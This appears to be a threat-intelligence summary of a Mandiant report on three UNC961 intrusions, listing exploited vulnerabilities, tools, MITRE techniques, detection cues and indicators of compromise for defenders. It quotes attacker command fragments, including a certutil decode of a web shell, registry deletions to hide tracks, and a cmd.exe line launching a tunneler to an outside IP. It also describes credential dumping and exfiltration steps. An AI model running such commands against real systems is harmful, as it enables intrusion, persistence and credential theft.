Threat Research

UNC961 in the Multiverse of Mandiant: Three Encounters with a Financially Motivated Threat Actor | Mandiant

GoogleCloudIntel

Mandiant describes three UNC961 intrusions (Dec 2021–Jul 2022) that leveraged publicly available exploit code against internet-facing applications (e.g., Log4Shell, JBoss CVE-2017-7504) to deploy shells, tunnellers, and backdoors, with one case involving an access hand-off to UNC3966 leading to data exfiltration. The report details payloads and tools such as HOLEPUNCH, HOLERUN, MUTEPUT, BLUEBEAM web shells, BARNWORK, LIGHTBUNNY and TURNSIGN, detection opportunities, and IOCs. #UNC961 #UNC3966 #MobileIron #HOLEPUNCH #HOLERUN #MUTEPUT #BLUEBEAM #BARNWORK #LIGHTBUNNY #TURNSIGN #CVE-2021-44228

Keypoints

  • UNC961 used publicly available exploit code against internet-facing servers (Log4Shell, Atlassian Confluence, JBoss CVE-2017-7504, Citrix ADC, WebLogic, GitLab) to gain initial access.
  • Initial payloads included non-interactive bash reverse shells and web-shells (Base64-encoded, decoded via certutil), enabling hands-on-keyboard activity under server processes like java.exe and Tomcat.
  • Post-exploitation tools deployed by UNC961 included HOLEPUNCH tunneler, HOLEPUNCH-like SOCKS tunnellers, HOLERUN and MUTEPUT services; UNC3966 later deployed BARNWORK, LIGHTBUNNY, and used WinSCP/SSH for exfiltration.
  • Detection opportunities included network egress strings (‘bash: no job control in this shell’), application logs containing JNDI exploit strings, java.exe spawning cmd/certutil, and suspicious Service/Scheduled Task/BITS activity.
  • UNC3966 performed extensive credential and domain discovery (LSASS dumps, DCSync, ntds.dit export, ADFind/ShareFinder) and compressed/exfiltrated NAS data with 7‑Zip and WinSCP over SSH.
  • Managed Defense containment and proactive hunting limited impact in two incidents; in the third, a delayed response necessitated extensive remediation (rebuilds, password resets, data scoping).

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Used to establish bash TCP reverse shells; detection cue was the non-interactive shell message ( ‘bash: no job control in this shell’ )
  • [T1190] Exploit Public-Facing Application – Exploited JBoss CVE-2017-7504 and Log4Shell (CVE-2021-44228) for initial access ( ‘triggered CVE-2021-44228 by submitting the exploit into the application’s web portal login’ )
  • [T1505.003] Server Software Component: Web Shell – Wrote Base64-encoded web shells and deployed JSP web shells ( ‘echo > k.txt’ and resulting ‘httpil.jsp’ )
  • [T1140] Deobfuscate/Decode Files or Information – Used certutil to decode Base64-encoded web shell payloads ( ‘certutil -f -decode … k.txt … k.jspx’ )
  • [T1018] Remote System Discovery – Performed network connectivity checks via ping and nslookup ( ‘ping -n 1 119.9.3[.]198’ )
  • [T1069.001] Permission Groups Discovery: Local Groups – Enumerated local permission groups and users with net/user commands ( ‘net user’ )
  • [T1069.002] Permission Groups Discovery: Domain Groups – Queried domain group and trust information during discovery ( ‘nslookup /domain’ )
  • [T1016] System Network Configuration Discovery – Collected interface/config data via ipconfig ( ‘ipconfig /all’ )
  • [T1033] System Owner/User Discovery – Queried logged-on users using quser ( ‘quser’ )
  • [T1083] File and Directory Discovery – Used dir to enumerate file system contents ( ‘dir c:users’ )
  • [T1105] Ingress Tool Transfer – Downloaded additional tooling via wget and BITS (URLs and Wget user-agent ‘Wget/1.11.4’ and BITS jobs logged)
  • [T1543.003] Create or Modify System Process: Windows Service – Installed persistence as Windows services (HOLERUN ‘wmhost’, MUTEPUT ‘WindowsNTApp’, TURNSIGN ‘WmiPrv’)
  • [T1053.005] Scheduled Task – Deployed tunneler/backdoor components as Scheduled Tasks (LIGHTBUNNY Task ‘MKSAuth’, BARNWORK Task ‘MKSAuth’)
  • [T1197] BITS Jobs – Used Windows BITS to retrieve payloads ( ‘Microsoft-Windows-Bits-Client/Operational’ EID 59 entries referencing ms-prod19-live[.]com )
  • [T1567] Exfiltration to Cloud Storage – Uploaded credential dumps and files to public file sharing services (uploaded LSASS dumps to ‘dropmefiles[.]com’)
  • [T1112] Modify Registry – Removed or altered Registry keys to cover tracks ( ‘reg delete “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault” /va /f’ )
  • [T1070.007] Indicator Removal on Host: Timestomping/Registry – Deleted Registry MRU and typed paths to erase evidence (registry delete commands shown)
  • [T1047] Windows Management Instrumentation – Collected system info with wmic.exe ( ‘wmic /node:”10.0.0.1″ logicaldisk get deviceid,drivetype,…’ )
  • [T1003.001] OS Credential Dumping: LSASS Memory – Dumped LSASS process memory via Task Manager (Taskmgr write ‘lsass.DMP’)
  • [T1560.001] Archive via 7‑Zip – Created compressed archives of NAS data with 7‑Zip before exfiltration (7zG.exe examples for Contracts and Accounting paths)
  • [T1048] Exfiltration Over Alternative Protocols – Transferred large volumes over SSH/WinSCP to remote IPs (WinSCP connections to ‘104.149.170[.]183:22’ and ‘23.227.203[.]214:22’)
  • [T1078.002] Valid Accounts: Domain Accounts – Used a compromised domain administrator account for RDP and lateral movement ( ‘using a compromised domain administrator account’ )
  • [T1021.001] Remote Services: RDP – Lateral movement via RDP sessions ( ‘moved laterally through the environment over Remote Desktop Protocol (RDP)’ )
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Executed PowerShell from backdoor processes for script execution (PowerShell command example launching a .ps1 script)
  • [T1572] Protocol Tunneling – Employed tunneler tools wrapping custom protocols over SOCKS (LIGHTBUNNY and HOLEPUNCH/TURNSIGN usage described)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Launched tunneler binaries via cmd.exe ( ‘cmd.exe /c “C:UsersAdministratorAppDataLocalTempvmtools.exe 37.1.209[.]20 443″‘ )
  • [T1135] Network Share Discovery – Used Invoke-ShareFinder/ShareFinder PowerShell to enumerate network shares ( ‘Invoke-ShareFinder’ and output files ‘sh.txt’ )
  • [T1003.006] OS Credential Dumping: DCSync – Evidence of Mimikatz DCSync usage for domain credential access ( ‘Mimikatz DCSync’ )
  • [T1003.003] OS Credential Dumping: NTDS.dit – Dumped Active Directory ntds.dit using ntdsutil (files ‘ntds.dit’ and registry hive dumps listed)
  • [T1136.002] Create Account: Domain Account – Created new domain user and added it to Domain Admins ( ‘created a new domain user account and added it to the Domain Admins’ )
  • [T1098] Account Manipulation – Modified domain privileges and accounts to maintain access (new domain admin account additions)
  • [T1569.002] System Services: Service Execution – Executed PsExec and installed services then removed them (PsExec service install and ‘sc delete psexesvc’)

Indicators of Compromise

  • [MD5 hash] Malware samples – c55f4b123c645f9c5a1d00205ab2e61e (LIGHTBUNNY), 31c49b87463f4e4ce6ae4c442319d3a2 (HOLERUN)
  • [IP address] Command-and-control / exfiltration endpoints – 104.149.170[.]183, 23.227.203[.]214 (WinSCP/SSH exfil targets), and 7 more IPs used for C2 and exploitation (e.g., 37.1.209[.]20, 107.181.187[.]184)
  • [Domain / URL] Download and DNS indicators – ms-prod19-live[.]com (BITS download URLs: ‘/rehjhj8785780923853/abc’, ‘/cdef’), intensive[.]int (nslookup activity) and file[.]io / dropmefiles[.]com used for tool/download hosting and upload
  • [File names] Deployed web shells and artifacts – httpil.jsp (BLUEBEAM web shell), k.txt / k.jspx (Base64-encoded web shell intermediate), HOW_DECRYPT.TXT (ransom note)
  • [Service / task names] Persistence artifacts – Windows service names ‘wmhost’, ‘WindowsNTApp’, ‘WmiPrv’ and scheduled task names ‘MKSAuth’, ‘MKS Update Tools’

UNC961 repeatedly used public exploit code to write and execute shells on vulnerable application servers: Log4Shell payloads logged to MobileIron Core spawned bash reverse shells (detected via the ‘bash: no job control in this shell’ network string), and JBoss deserialization (CVE-2017-7504) was used to echo Base64 payloads that were decoded with certutil into JSP web shells (k.txt → k.jspx → httpil.jsp). Operators performed discovery and persistence from those shells (ps / kill to remove other actors, net/quser/ipconfig/dir commands under java.exe), then installed tunnellers or backdoors (HOLEPUNCH, HOLEPUNCH-like SOCKS tools, HOLEPUNCH on UNIX/Windows, and later HOLERUN/MUTEPUT as Windows services) to maintain remote connectivity.

When web shells were present, adversaries executed sequences of actions: write Base64 payloads, decode to web-accessible files via certutil, run discovery commands (nslookup/ping/ipconfig/quser/net), and then stage additional tools via wget or BITS. In one incident UNC961 installed HOLERUN and MUTEPUT, later handing off access to UNC3966, which deployed BARNWORK and LIGHTBUNNY, used scheduled tasks and BITS/wget for persistence/downloads, dumped credentials (LSASS dumps, Mimikatz DCSync, ntds.dit via ntdsutil), compressed sensitive NAS data with 7‑Zip, and exfiltrated files over SSH with WinSCP to attacker-controlled IPs.

Detection and response opportunities include monitoring for non-interactive shell network strings (‘bash: no job control in this shell’), application logs containing JNDI exploit URIs, java.exe spawning cmd/certutil and writing Base64 files, suspicious BITS job entries referencing unfamiliar URLs, anomalous Wget user-agents, creation of unusual Windows services or scheduled tasks (service names and binary paths listed), large outbound SSH transfers, and registry deletions indicative of indicator removal. Containment actions that proved effective were isolating compromised servers, removing services/tasks, revoking/staggering credentials, rebuilding infected hosts, and enterprise password resets to prevent further lateral movement and ransomware deployment.

Read more: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint